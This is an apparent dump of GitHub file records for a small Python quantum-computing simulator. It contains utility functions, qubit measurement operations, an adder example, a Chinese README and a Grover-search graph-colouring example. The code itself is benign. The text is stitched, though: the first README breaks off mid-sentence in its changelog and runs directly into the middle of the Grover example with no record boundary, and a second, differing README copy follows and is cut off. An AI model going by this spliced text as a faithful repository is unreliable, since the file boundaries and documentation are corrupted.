"UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"一些库内大量使用的方法和小工具\n\ndelta: 控制浮点数比较精度 [default: 1e-8]\nColorWeel2RGB()\nTimeChunck\n\"\"\"\n\nfrom typing import Any, Callable, Dict, Iterable, List, Literal, Optional, Tuple, Union\nfrom time import time\n\nimport numpy as np\n\nfrom .Options import *\n\n\n__all__ = 
[\"equal0\", \"sss\", \"delta\", \"ColorWheel2RGB\", \"TimeChunck\",\n \"Bools2Int\", \"Int2Bools\", \"pi\", \"nBits\", \"Bools2str01\",\n \"gcd\", \"extended_gcd\", \"Frac2ContinuedFrac\", \"ContinuedFrac2Frac\"]\n\n\npi = np.pi\n\ndelta = 1e-8\n\n\ndef equal0(x: float) -> bool:\n return abs(x) <= delta\n\n\ndef sss(arr: np.ndarray) -> Any:\n return np.sum(np.square(np.abs(arr)))\n\n\ndef colorF(n: int, h: float) -> float:\n k = np.mod(n + h, 6.)\n if k <= 2:\n return np.clip(k, 0., 1.)\n return np.clip(4. - k, 0., 1.)\n\n\ndef ColorWheel2RGB(theta: float, get01: bool = False) -> \\\n Union[Tuple[int, int, int], Tuple[float, float, float]]:\n \"\"\"从色环上获取颜色\n\n 输入色环角度可以获取RGB颜色, 0为红色, 2*pi/3为绿色, 4*pi/3为蓝色\n\n Args:\n theta: 色环角度\n get01: 如果为真, 返回[0.~1.]的浮点数, 否则为[0~255]的整数\n\n Return:\n 返回包含RGB颜色的元组\"\"\"\n h_pi_3 = 3. * theta / pi\n red = colorF(2, h_pi_3)\n green = colorF(0, h_pi_3)\n blue = colorF(4, h_pi_3)\n if get01:\n return red, green, blue\n return int(red * 255.), int(green * 255.), int(blue * 255.)\n\n\ntotaltimer: Dict[str, List[Union[int, float]]] = dict()\n\nclass TimeChunck:\n \"\"\"TimeChunk(str)\n\n 配合with语句计算特定代码块调用的次数和总共运行时间\n\n To use:\n >>> for _ in range(15):\n ... with TimeChunck(\"test\"):\n ... time.sleep(0.03)\n ...\n >>> TimeChunck.getAll()\n {'test': [15, 0.47789764404296875]}\n \"\"\"\n def __init__(self, name: str):\n self.name = name\n self.start = 0.\n\n @staticmethod\n def getAll() -> Dict[str, List[Union[int, float]]]:\n \"\"\"得到全部计时条目\n\n Returns:\n 一个字典包含计时名词, 和调用次数与总共运行时间的列表\"\"\"\n return totaltimer\n\n def __enter__(self):\n if self.name not in totaltimer:\n totaltimer[self.name] = [0, 0.]\n self.start = time()\n\n def __exit__(self, _:Any, __: Any, ___: Any) -> None:\n totaltimer[self.name][0] += 1\n totaltimer[self.name][1] += time() - self.start\n\n\ndef Bools2Int(bools: Iterable[Union[Literal[0, 1], bool]]) -> int:\n \"\"\"把bit列表转为int\n\n Args:\n l: 可迭代的对象, 内部元素为bool或0,1\n\n Returns:\n 逐位排列组成的整数\"\"\"\n res = 0\n for ele in (list(bools)[::-1] if Options.littleEndian else bools):\n res <<= 1\n res |= int(ele)\n return res\n\n\ndef Int2Bools(x: int, n: Optional[int] = None) -> List[bool]:\n \"\"\"把int转为bit列表\n\n Args:\n x: 需要转化的整数, 必须大于等于0\n n: 输出列表的长度, 默认为可以表示x的最短长度\n\n Returns:\n bool列表, 第1个为x的高位\"\"\"\n if x < 0:\n raise ValueError(\"Negative numbers cannot be converted to 'bools'\")\n if n is None:\n res: List[bool] = list()\n while x > 0:\n res.append(x & 1 == 1)\n x >>= 1\n else:\n res: List[bool] = [False] * n\n for i in range(n):\n if x <= 0:\n break\n res[i] = x & 1 == 1\n x >>= 1\n return res if Options.littleEndian else res[::-1]\n\n\ndef FlipBools(bools: Iterable[Union[Literal[0, 1], bool]]) -> List[bool]:\n \"\"\"翻转列表里的所有布尔值\n\n Args:\n l: 可迭代对象, 内部元素为bool或0,1\n\n Returns:\n 翻转布尔值后的数组\"\"\"\n return [not bool(ele) for ele in bools]\n\n\ndef nBits(x: int) -> int:\n \"\"\"检查x至少需要多少bits表示\n\n Args:\n x: 需要检查的数字, 应该大于等于0\n\n Returns:\n 至少可以表示x的bit长度\"\"\"\n if x < 0:\n raise ValueError(\"x should be greater than 0\")\n n = 0\n while x > 0:\n x >>= 1\n n += 1\n return max(n, 1)\n\n\ndef Bools2str01(bools: Iterable[Union[Literal[0, 1], bool]]) -> str:\n \"\"\"把bit列表表示为更好的二进制字符串\n\n Args:\n bools: bit列表\n\n Returns:\n 0和1组成的字符串\"\"\"\n return \"\".join(map(lambda x: '1' if x else '0', bools))\n\n\ngcd: Callable[[int, int], int] = lambda a, b: np.gcd(a, b)\n\n\ndef extended_gcd(a: int, b: int) -> Tuple[int, int, int]:\n \"\"\"扩展欧几里得算法\n\n 求得满足 a*x + b*y = gcd(a,b) 的数字\n\n Args:\n a: 整数\n b: 整数\n\n Returns:\n x, y, gcd(a,b) 组成的元组\"\"\"\n old_r, r 
= a, b\n old_s, s = 1, 0\n old_t, t = 0, 1\n while r != 0:\n quotient = old_r // r\n old_r, r = r, old_r - quotient * r\n old_s, s = s, old_s - quotient * s\n old_t, t = t, old_t - quotient * t\n return old_s, old_t, old_r\n\n\ndef Frac2ContinuedFrac(a: int, b: int) -> List[int]:\n \"\"\"普通分式化为连分式\"\"\"\n result: List[int] = list()\n while b >= 1:\n c, t = divmod(a, b)\n result.append(c)\n a, b = b, t\n return result\n\n\ndef ContinuedFrac2Frac(fracs: List[int]) -> Tuple[int, int]:\n \"\"\"连分式化为普通分式\"\"\"\n f = fracs.copy()\n a, b = f.pop(), 1\n while len(f) > 0:\n a, b = a * f.pop() + b, a\n return a, b\n" }, { "alpha_fraction": 0.544562578201294, "alphanum_fraction": 0.5564186573028564, "avg_line_length": 25.301074981689453, "blob_id": "14c7ffeead94ec7ef54fd08e8e51943ad4b30543", "content_id": "dd252559453d5a4ae620df1a2009018160d33db1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2554, "license_type": "no_license", "max_line_length": 78, "num_lines": 93, "path": "/nyasQuantumCalculate/Operate/Measure.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import List\n\nimport numpy as np\n\nfrom .QubitsOperation import *\nfrom nyasQuantumCalculate.Utils import *\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"M\", \"MA\"]\n\n\nclass _MEASURE(QubitsOperation):\n \"\"\"测量一个量子位\n\n Args:\n qb: 需要重置的量子位\n\n Returns:\n 如果测量为0返回False, 否则返回True\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.name = \"MEASURE\"\n self.trackable = True\n\n def call(self, qb: Qubit) -> bool:\n qbsys = qb.system\n states = qbsys.statesNd.swapaxes(0, qbsys.statesNdIndex(qb.index))\n prob0 = sss(states[0, ...])\n prob1 = sss(states[1, ...])\n choice = 0 if np.random.random() * (prob0 + prob1) <= prob0 else 1\n states[choice, ...] /= np.sqrt(sss(states[choice, ...]))\n states[1 - choice, ...] *= 0.\n return choice == 1\n\n def __call__(self, qb: Qubit) -> bool:\n qbsys = qb.system\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, qb.index)\n qbsys.stopTracking = True\n result = self.call(qb)\n if not sysStopTrack:\n qbsys.stopTracking = False\n return result\n\n\nclass _MEASUREALL(QubitsOperation):\n \"\"\"测量多个量子位\n\n Args:\n qbs: 需要重置的量子位\n\n Returns:\n bool列表, 如果测量为0返回False, 否则返回True\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.name = \"MEASUREALL\"\n self.trackable = True\n\n def call(self, qbs: Qubits) -> List[bool]:\n qbsys = qbs.system\n result: List[bool] = list()\n for index in qbs.indexes:\n states = qbsys.statesNd.swapaxes(0, qbsys.statesNdIndex(index))\n prob0 = sss(states[0, ...])\n prob1 = sss(states[1, ...])\n choice = 0 if np.random.random() * (prob0 + prob1) <= prob0 else 1\n states[1 - choice, ...] 
*= 0.\n result.append(choice == 1)\n qbsys.normalize()\n return result\n\n def __call__(self, qbs: Qubits) -> List[bool]:\n qbsys = qbs.system\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, *qbs.indexes)\n qbsys.stopTracking = True\n result = self.call(qbs)\n if not sysStopTrack:\n qbsys.stopTracking = False\n return result\n\n\nM = _MEASURE()\nMA = _MEASUREALL()\n" }, { "alpha_fraction": 0.4237288236618042, "alphanum_fraction": 0.43220338225364685, "avg_line_length": 18.66666603088379, "blob_id": "c64dbe34d3bd8f4696bd2336d93012ea0fc9fec8", "content_id": "4c9dee15f27c8f7af8dcb91da2b87c33fe1f9215", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 118, "license_type": "no_license", "max_line_length": 67, "num_lines": 6, "path": "/nyasQuantumCalculate/RevCal/Builtin.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom .Operate import *\n\n\n__all__ = [\"M\", \"MA\", \"R\", \"RA\", \"I\", \"X\", \"CNOT\", \"CCNOT\", \"SWAP\"]\n" }, { "alpha_fraction": 0.4861690104007721, "alphanum_fraction": 0.48654794692993164, "avg_line_length": 31.987499237060547, "blob_id": "2a2921c83548d582c3198156ec67aa3e1bb92cd7", "content_id": "eb71f26f682c98db0a18f11653122fdb0e15c931", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3103, "license_type": "no_license", "max_line_length": 65, "num_lines": 80, "path": "/nyasQuantumCalculate/Operate/QubitsOperation.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Any, Callable, Type, TypeVar\n\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"QubitsOperation\", \"OperationLike\"]\n\n\nOperationLike = TypeVar(\"OperationLike\",\n \"QubitsOperation\",\n Type[\"QubitsOperation\"],\n Callable[..., Any])\n\n\nclass QubitsOperation:\n \"\"\"QubitsOperation(str, bool)\n\n 用来标记量子位过程, 暂时没有什么用处.\n\n Attributes:\n name: 量子位过程的名字\n controllable: 过程是否可控\n trackable:\n 过程是否可跟踪, 当为True时, 跟踪过程\"应该\"覆盖掉底层操作, 当这个特性\n 需要暂时由用户自己提供, 参考`QubitsSystem.stopTracking`,\n `canTrack()`,`addTrack()`\n\n 推荐编写量子位过程的写法:\n class MyOperation(QubitsOperation):\n def __init__(self):\n super().__init__()\n self.name = \"自定义过程的名字\"\n # self.controllable = ...\n self.trackable = True # 用于化简跟踪信息\n\n def call(self, qbs: Qubits, qb: Qubit) -> None:\n # 这个方法记述量子过程的运算\n # 一般量子过程都是不返回值的\n ...\n\n def __call__(self, qbs: Qubits, qb: Qubit) -> None:\n # 这个方法用于控制过程的跟踪和判断错误等\n if Options.inputCheck:\n if not inSameSystem(qbs, qb):\n # 判断输入量子位是否在同一个系统内\n raise ValueError(...)\n if any(isControllingQubits(qbs, qb)):\n # 判断输入量子位是否存在控制位\n raise ValueError(...)\n if haveSameQubit(qbs, qb):\n # 判断是否有重复的量子位\n raise ValueError(...)\n qbsys = qbs.system # 从输入参数里获得量子位系统\n sysStopTrack = qbsys.stopTracking # 用于在退出方法时还原\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(...) # 添加跟踪条目\n qbsys.stopTracking = True # 停止跟踪\n self.call(qbs, qb) # 作用过程\n if not sysStopTrack:\n # 还原系统原本的状态\n qbsys.stopTracking = False\n \"\"\"\n def __init__(self, name: str = \"\",\n controllable: bool = False,\n trackable: bool = False,\n **kwargs: Any) -> None:\n self.name = name\n self.controllable = controllable\n self.trackable = trackable\n\n @staticmethod\n def getOperation(opr: OperationLike) -> Callable[[Any], Any]:\n return opr() if isinstance(opr, type) else opr\n\n #def call(self, ...) 
-> ...: ...\n\n def __call__(self, *args: Any, **kwargs: Any) -> Any:\n raise NotImplementedError\n" }, { "alpha_fraction": 0.7168141603469849, "alphanum_fraction": 0.721238911151886, "avg_line_length": 21.600000381469727, "blob_id": "b537525c10fbc3895600b9a80315e184c42e7add", "content_id": "d499b00d54f25d4240d8558f872f93a611a4874d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 226, "license_type": "no_license", "max_line_length": 30, "num_lines": 10, "path": "/nyasQuantumCalculate/Operate/__init__.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom .QFT import *\nfrom .Swap import *\nfrom .ControlMethod import *\nfrom .ApplyMethod import *\nfrom .Reset import *\nfrom .Measure import *\nfrom .SingleQubitGate import *\nfrom .QubitsOperation import *\n" }, { "alpha_fraction": 0.5734907984733582, "alphanum_fraction": 0.5944882035255432, "avg_line_length": 18.049999237060547, "blob_id": "3e72f35fb116abcadb357541193dbcfdb4665dff", "content_id": "30d324a3aa4a814d9da96fc35c0d2972679ed581", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 762, "license_type": "no_license", "max_line_length": 50, "num_lines": 40, "path": "/examples/others/Adder.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nUSE_QUANTUM = False\nn = 3\n\n\nif USE_QUANTUM:\n from nyasQuantumCalculate import *\n Bit = Qubit\n Bits = Qubits\n BitsSystem = QubitsSystem\nelse:\n from nyasQuantumCalculate.RevCal import *\n\nfrom nyasQuantumCalculate.Utils import Bools2Int\nfrom typing import Any\nX: Any = Builtin.X\n\n\nbsys = BitsSystem(2 * (n + 1))\nCin = bsys[0]\nA = bsys[1:n+1]\nB = bsys[n+1:2*n+1]\nCout = bsys[2*n+1]\n\n\nfor a in range(2 ** n):\n for b in range(2 ** n):\n X(Cin)\n ApplyFromInt(X, a, A)\n ApplyFromInt(X, b, B)\n\n # nyasQuantumCalculate.HighLevel.Add.Adder\n Adder(Cin, A, B, Cout)\n\n result = [Builtin.M(Cout)] + Builtin.MA(B)\n Builtin.RA(bsys[:])\n\n print(f\"{a} + {b} = {Bools2Int(result)}\")\n" }, { "alpha_fraction": 0.6383363604545593, "alphanum_fraction": 0.6401446461677551, "avg_line_length": 28.105262756347656, "blob_id": "dbb0c22a52a10fba5dee7c816025fb94c7a119c2", "content_id": "2df9117f435e9c10f577f03da195759c106ac2b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1106, "license_type": "no_license", "max_line_length": 72, "num_lines": 38, "path": "/nyasQuantumCalculate/__init__.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom .HighLevel import *\nfrom .Operate import *\nfrom .System import *\nfrom .Options import *\n\nfrom . import Builtin\nfrom . 
import Utils\n\n__all__ = [\n \"Builtin\", \"Utils\",\n # .HighLevel.Add\n \"Adder\", \"PhaseAdd\", \"IPhaseAdd\", \"Add\", \"IAdd\",\n \"PhaseAddInt\", \"IPhaseAddInt\", \"AddInt\", \"IAddInt\",\n # .HighLevel.Modular\n #\"PhaseModularAddInt\", \"ModularAddInt\",\n # .Operate.ApplyMethod\n \"ApplyToEach\", \"ApplyFromBools\", \"ApplyFromInt\",\n # .Operate.ControlMethod\n \"Controlled\", \"ControlledOnInt\", \"Toffoli\",\n # .Operate.QubitsOperation\n \"QubitsOperation\", \"OperationLike\",\n # .Operate.SingleQubitGate\n \"SingleQubitGate\", \"Rx\", \"Ry\", \"Rz\", \"R1\", \"Phase\", \"RotationGates\",\n # .System.__init__\n \"inSameSystem\", \"isControllingQubits\", \"haveSameQubit\",\n # .System.Dump\n \"DumpSystemText\", \"DumpSystemFig\", \"have_matplotlib\",\n # .System.Qubit\n \"Qubit\", \"TemporaryQubit\",\n # .System.Qubits\n \"Qubits\", \"TemporaryQubits\",\n # .System.QubitsSystem\n \"QubitsSystem\",\n # .Options\n \"Options\", \"TemporaryOptions\", \"TempOption\"\n]\n" }, { "alpha_fraction": 0.6430020332336426, "alphanum_fraction": 0.6609195470809937, "avg_line_length": 23.649999618530273, "blob_id": "61744848eb8fbc9c00d8bbbb0e96cf0bf64845b2", "content_id": "e2ba624ddab3931b8d2e66815591d4ac8967e7fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4742, "license_type": "no_license", "max_line_length": 174, "num_lines": 120, "path": "/README.md", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# nyasQuantumCalculate\n一个简单的量子计算模拟库\n```python\nfrom nyasQuantumCalculate import *\n\nqbsys = QubitsSystem(1)\nqubit = qbsys[0]\nBuiltin.H(qubit)\nresult = Builtin.M(qubit)\nprint(result) # False or True\n```\n\n---\n\n## 安装\n\n1. 下载这个仓库\n2. 运行`python setup.py install`\n3. 试着运行`examples/`里的例子\n\n---\n\n## 使用\n\n1. 量子位系统\n\n * 使用 `QubitsSystem(int)` 初始化量子位系统\n\n2. 量子位\n\n * 常用的量子位类型有 `Qubit` 和 `Qubits`\n * 可以通过 `qbsys.getQubit(int)` 和 `qbsys.getQubits(int, ...)` 获得量子位, 其中`qbsys`是`QubitsSystem`实例\n * 当然也可以通过 `qbsys` 的索引方法获得\n\n3. 量子位门\n\n * `Builtin`里有常用的量子位门 `I`, `H`, `X`, `Y`, `Z`, `S`, `T`, `SR`, `TR`, `CNOT`, `CCNOT`\n * 使用 `Rx(float)`, `Ry(float)`, `Rz(float)`, `R1(float)`, `Phase(float)` 可以获取旋转门和相位门\n * 量子位门通过 `__call__` 方法作用在量子位上, 如: `X(qb)`\n * 或使用方法 `ApplyToEach` 把单量子位门作用在 `Qubits` 里每个量子位上\n * 提供了 `Controlled` 方法, 实现可控过程\n * `QFT` 和 `IQFT` 如同位门一样直接作用在多量子位上\n\n4. 测量系统\n\n * 可以使用方法 `Builtin.M` 测量`Qubit`, 并返回测量结果 (`False` 或 `True`)\n * 或使用方法 `Builtin.MA` 测量`Qubits`, 并返回包含测量结果的列表\n\n5. 重置系统\n\n * 使用方法 `Builtin.R` 重置`Qubit`, 方法 `Builtin.RA` 重置`Qubits`\n * 可以直接使用语句 `Builtin.RA(qbsys.getQubits())` 重置整个系统\n * 退出程序或释放`QubitsSystem`实例前重置整个系统是好习惯\n\n---\n\n## FAQ\n\n* 这个库有前置库吗\n\n 需要 `numpy` 来执行底层运算. 推荐安装 `matplotlib` 来使用比较美观的量子系统可视化方法 `DumpSystemFig`\n\n* 为什么不把库放到`pypi`上呢\n\n 目前这个库还只是半成品. 并且pypi上可以安装qsharp等更好的库, ~~不想继续增加pip里面的垃圾了~~.\n\n* 内置的方法好少, 使用好困难\n\n 目前这个库还是测试版本, 日后会增加更多功能\n\n* 为什么执行`QFT`和`IQFT`的时候使用内存翻了一倍\n\n 使用`numpy`算法的`QFT`底部逻辑是重新构建一个系统状态`statesNd`, 请确保没有在其他地方引用`qbsys.statesNd`. 如果实在需要引用`statesNd`, 可以通过 `Options.QFTwithNumpy = False` 把`QFT`逻辑切换为位门实现, 在很多量子位(如20个以上)速度会受到严重影响.\n\n* 我可以跟别人分享这个库吗, 有什么限制吗\n\n 莫得限制, 随便来就好, 最好可以标注一下作者啦\n\n---\n\n### 0.1.1\n\n减少了部分逻辑, 使某些功能更通用. 例如支持多重控制, 删除临时量子位前必须由用户重置而不是自动重置\n\n增加了内部库 `Builtin`, 内置的位门,测量,重置等操作都以`常量`收录在里面, 而不是直接暴露在表层\n\n增加了 `AQFT` 和 `IAQFT` 在`Builtin`里. See more: `help(Builtin.AQFT)`\n\n重构了库之间的引用顺序, `Reset`, `Measure`, `ResetAll`, `MeasureAll` 已被 `Builtin.R`, `Builtin.M`, `Builtin.RA`, `Builtin.MA` 替代\n\n新增内部库 `RevCal`, 模拟电子计算机的可逆计算. 大部分方法与量子计算相同, 内置`X`(可逆NOT门), `CNOT`(可逆XOR门), `CCNOT`(可逆AND门). 使用: 输入使用`ApplyFromInt(X, int, Bits)`, 输出使用 `Builtin.MA(Bits)`.\n\n**不要同时引用 `nyasQuantumCalculate` 和 `nyasQuantumCalculate.RevCal`**\n\n### 0.1.2\n\n取消 **选项**`reverseBitIndex`, 增加 **选项**`littleEndian`. 
图形着色问题, 数据库搜索也属于搜索问题.\n\"\"\"\n\n\n############################ 图形着色问题 ####################################\nr\"\"\"下面以一个实际的问题作为 Grover 算法的例子\nhttps://en.wikipedia.org/wiki/Graph_coloring\n\n构建一个无向图:\n 0------1\n |\\ /|\n | \\ / |\n | \\/ |\n | /\\ |\n | / \\ |\n |/ \\|\n 2------3------4\n寻找一种着色方案使得每条边上不存在相同的颜色.\n\n在这个例子中, 需要的最少颜色为4种, 使用2bits对一个顶点的颜色进行编码.\n总共5个顶点, 则需要10bits储存结果.\n\"\"\"\n\n# 使用索引表示线段与点的关系\nedges = [(0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3), (3, 4)]\n# 表示颜色需要的bit数\nnColorBits = 2\n# 总共顶点数\nnVertex = max(max(edge) for edge in edges) + 1\n\n\ndef ColorEquality(c0: Qubits, c1: Qubits, target: Qubit):\n \"\"\"计算输入的两种颜色是否相同, 如果相同则翻转target的状态, 否则什么也不做\"\"\"\n # 把c0和c1按位做异或, 并把结果储存在c1\n for q0, q1 in zip(c0, c1):\n Builtin.CNOT(q0, q1)\n # 如果c1全部为0, 则c0与c1相同, 此时翻转target的状态\n ApplyToEach(Builtin.X, c1)\n Controlled(Builtin.X, c1, target)\n\n # 因为作为数据位的c1被修改了, 在退出前需要还原c1的数据\n ApplyToEach(Builtin.X, c1)\n for q0, q1 in zip(c0, c1):\n Builtin.CNOT(q0, q1)\n\n\ndef ValidVertexColoring(register: Qubits, target: Qubit):\n \"\"\"计算按照edges的图形, colors的着色是否为解, 如果是则翻转target, 否则什么也不做\"\"\"\n # 输入的colors的量子位数量应该为 颜色的bit数*总定点数, 在这里为10\n assert len(register) == nColorBits * nVertex\n\n # 把寄存器分离为顶点\n colors = [register[nColorBits*v: nColorBits*(v+1)] for v in range(nVertex)]\n\n # 使用寄存器记录每条边的顶点颜色是否一样\n with TemporaryQubits(register.system, len(edges)) as edgesResult:\n # 对每一条边计算两顶点的颜色是否一样, 并把结果储存在edgesResult里\n for (idx0, idx1), edgeResult in zip(edges, edgesResult):\n ColorEquality(colors[idx0], colors[idx1], edgeResult)\n # 如果edgesResult的结果全部为|0❭, 则证明全部边上不存在相同的颜色,\n # 这时候colors的着色为解, 则翻转target\n ApplyToEach(Builtin.X, edgesResult)\n Controlled(Builtin.X, edgesResult, target)\n\n # 尽管在退出with时会自动重置edgesResult,\n # 但是手动还原为原本的状态是良好的习惯\n ApplyToEach(Builtin.X, edgesResult)\n for (idx0, idx1), edgeResult in zip(edges, edgesResult):\n ColorEquality(colors[idx0], colors[idx1], edgeResult)\n\n\n\"\"\"Grover算法需要不断迭代Grover过程才可以得到需要的答案,\n\nGrover过程包含以下两步:\n 1) 把标记状态的相位反转\n 2) 作用Grover扩散算子(Grover diffusion operator)\n\nGrover扩散算子可以减少大于平均值的状态而增加少于平均值的状态,\n当需要的结果数量小于不需要的结果数量时, Grover扩散算子可以有效地增加需要的结果的机率.\n\n记M为全部需要结果的数量, N为全部结果的数量 (在这里M=72, N=2^10=1024)\n则迭代次数 j = round(π / (4 * arcsin(sqrt(M / N))) - .5); (在这里为2)\n\"\"\"\n\n\ndef GroverSearch(f: Callable[[Qubits, Qubit], None],\n register: Qubits, nIter: int):\n \"\"\"Grover算法是通用算法, 给出黑盒f和|0❭状态register, 并执行nIter次Grover过程\"\"\"\n # 使寄存器处于全部结果的叠加态里\n ApplyToEach(Builtin.H, register)\n # 使用\"相位反冲\"技巧翻转目标状态\n with TemporaryQubit(register.system) as target:\n Builtin.X(target)\n Builtin.H(target)\n\n # 执行Grover过程\n for _ in range(nIter):\n # 把标记状态的相位反转\n f(register, target)\n # 作用Grover扩散算子\n ApplyToEach(Builtin.H, register)\n ApplyToEach(Builtin.X, register)\n Controlled(Builtin.Z, register[0:-1], register[-1])\n ApplyToEach(Builtin.X, register)\n ApplyToEach(Builtin.H, register)\n # Grover扩散算子应该在执行完上述步骤后, 把全部状态的相位翻转\n # 但由于全局相位对计算和测量都没有影响, 所以最后一步并不是必须的\n Phase(pi)(register[-1]) # Grover扩散算子最后一步\n\n # 退出前还原临时量子位\n Builtin.H(target)\n Builtin.X(target)\n\n\n\"\"\"运行例子\n需要注意的是, Grover算法是以很大概率给出正确答案, 所以检查答案是否正确也是必须的\"\"\"\n\n\n# 计算迭代Grover过程的数量\nm = 72 # 正确答案的数量\nn = 2 ** (nColorBits * nVertex) # 所有答案的数量\nj = round(pi / (4 * arcsin(sqrt(m / n))) - .5)\n\n# 初始化量子位系统\nqbsys = QubitsSystem(nColorBits * nVertex)\nregister = qbsys.getQubits()\n\n# 这个result是不让编辑器提示result(169)不存在的, 并没有实际用途\nresult = Builtin.MA(register)\n\n# 使用一个额外的量子位判断答案是否正确, 如果不正确则继续运行Grover算法\nwith TemporaryQubit(qbsys) as Correctness:\n while Builtin.M(Correctness) == 0:\n # 运行Grover算法\n 
GroverSearch(ValidVertexColoring, register, j)\n\n # 测量寄存器, 并使量子位全部坍缩到测量结果里\n result = Builtin.MA(register)\n # 判断结果是否正确, 如果正确则把Correctness从|0❭变为|1❭\n ValidVertexColoring(register, Correctness)\n # 无论结果是否正确都需要重置寄存器\n Builtin.RA(register)\n # 因为while退出时Correctness必定处于|1❭, 则应用X门等于重置Correctness\n Builtin.X(Correctness)\n\n\n# 使用比较好的方式输出结果\nfor v in range(nVertex):\n print(f\"Vertex {v} has color \"\n f\"{Bools2Int(result[nColorBits*v : nColorBits*(v+1)])}\")\n" }, { "alpha_fraction": 0.6430020332336426, "alphanum_fraction": 0.6609195470809937, "avg_line_length": 23.649999618530273, "blob_id": "61744848eb8fbc9c00d8bbbb0e96cf0bf64845b2", "content_id": "e2ba624ddab3931b8d2e66815591d4ac8967e7fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4742, "license_type": "no_license", "max_line_length": 174, "num_lines": 120, "path": "/README.md", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# nyasQuantumCalculate\n一个简单的量子计算模拟库\n```python\nfrom nyasQuantumCalculate import *\n\nqbsys = QubitsSystem(1)\nqubit = qbsys[0]\nBuiltin.H(qubit)\nresult = Builtin.M(qubit)\nprint(result) # 0 or 1\n```\n\n---\n\n## 安装\n\n1. 下载这个仓库\n2. 运行`python setup.py install`\n3. 试着运行`examples/`里的例子\n\n---\n\n## 使用\n\n1. 量子位系统\n\n * 使用 `QubitsSystem(int)` 初始化量子位系统\n\n2. 量子位\n\n * 常用的量子位类型有 `Qubit` 和 `Qubits`\n * 可以通过 `qbsys.getQubit(int)` int和 `qbsys.getQubit(int, ...)` 获得量子位, 其中`qbsys`是`QubitsSystem`实例\n * 当然也可以通过 `qbsys` 的索引方法获得\n\n3. 量子位门\n\n * `Builtin`里有常用的量子位门 `I`, `H`, `X`, `Y`, `Z`, `S`, `T`, `SR`, `TR`, `CNOT`, `CCNOT`\n * 使用 `Rx(float)`, `Ry(float)`, `Rz(float)`, `R1(float)`, `Phase(float)` 可以获取旋转门和相位门\n * 量子位门通过 `__call__` 方法作用在量子位上, 如: `X(qb)`\n * 或使用方法 `ApplyToAll` 把单量子位们作用在 `Qubits` 里每个量子位上\n * 提供了 `Controlled` 方法, 实现可控过程\n * `QFT` 和 `IQFT` 如同位门一样直接作用在多量子位上\n\n3. 测量系统\n\n * 可以使用方法 `Builtin.M` 测量`Qubit`, 并返回测量结果 (`False` 或 `True`)\n * 或使用方法 `Builtin.MA` 测量`Qubits`, 并返回包含测量结果的列表\n\n4. 重置系统\n\n * 使用方法 `Builtin.R` 重置`Qubit`, 方法 `Builtin.RA` 重置`Qubits`\n * 可以直接使用语句 `Builtin.RA(qbsys.getQubits())` 重置整个系统\n * 退出程序或释放`QubitsSystem`实例前重置整个系统是好习惯\n\n---\n\n## FAQ\n\n* 这个库有前置库吗\n\n 需要 `numpy` 来执行底层运算. 推荐安装 `matplotlib` 来使用比较美观的量子系统可视化方法 `DumpMachineFig`\n\n* 为什么不把库放到`pypi`上呢\n\n 目前这个库还只是半成品. 并且pypi上可以安装qsharp等更好的库, ~~不想继续增加pip里面的垃圾了~~.\n\n* 内置的方法好少, 使用好困难\n\n 目前这个库还是测试版本, 日后会增加更多功能\n\n* 为什么执行`QFT`和`IQFT`的时候使用内存翻了一倍\n\n 使用`numpy`算法的`QFT`底部逻辑是重新构建一个系统状态`statesNd`, 请确保没有在其他地方引用`qbsys.stateNd`. 如果实在需要引用`statesNd`, 可以通过 `Options.QFTwithNumpy = False` 把`QFT`逻辑切换为位门实现, 在很多量子位(如20个以上)速度会受到严重影响.\n\n* 我可以跟别人分享这个库吗, 有什么限制吗\n\n 莫得限制, 随便来就好, 最好可以标注一下作者啦\n\n---\n\n### 0.1.1\n\n减少了部分逻辑, 使某些功能更通用. 例如支持多重控制, 删除临时量子位前必须由用户重置而不是自动重置\n\n增加了内部库 `Builtin`, 内置的位门,测量,重置等操作都以`常量`收录在里面, 而不是直接暴露在表层\n\n增加了 `AQFT` 和 `IAQFT` 在`Builtin`里. See more: `help(Builtin.AQFT)`\n\n重构了库之间的引用顺序, `Reset`, `Measure`, `ResetAll`, `MeasureAll` 已被 `Builtin.R`, `Builtin.RA`, `Builtin.M`, `Builtin.MA` 替代\n\n新增内部库 `RevCal`, 模拟电子计算机的可逆计算. 大部分方法与量子计算相同, 内置`X`(可逆NOT门), 